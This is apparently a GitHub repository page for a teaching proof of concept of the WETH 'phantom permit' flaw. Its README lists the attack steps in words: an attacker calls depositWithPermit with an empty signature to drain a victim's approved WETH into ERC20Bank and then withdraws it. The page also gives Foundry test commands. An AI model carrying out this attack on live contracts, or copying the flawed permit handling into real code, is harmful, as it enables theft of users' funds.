Skip to content

wezzcoetzee/weth-permit-exploit

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
.vscode
.vscode
 
 
lib
lib
 
 
src
src
 
 
test
test
 
 
.gitignore
.gitignore
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
bun.lockb
bun.lockb
 
 
package.json
package.json
 
 

Repository files navigation

WETH permit exploit

Most ERC20 contracts have a permit function that can be called, while WETH does not.

What is the exploit?

  1. Victim gives infinite approval for ERC20Bank.sol to spend WETH.
  2. Victim calls deposit and deposits 1 WETH into ERC20Bank.
  3. Attacker calls depositWithPermit and passes an empty signature and transfers all tokens from Victim into ERC20Bank, which is credited to the attacker's deposit in ERC20Bank.
  4. Attacker calls withdraw function.

Instructions

  1. Install Foundryup.
  2. Run the following command in your directory to install dependecies forge install foundry-rs/forge-std.
  3. Run the following to build your contract forge build.
  4. Run forge test -vvv to execute your tests.

About

Most ERC20 contracts have a permit function that can be called, while WETH does not.

Resources

Readme

License

MIT license

Code of conduct

Code of conduct

Contributing

Contributing

Security policy

Security policy
Activity

Stars

2 stars

Watchers

1 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published

Languages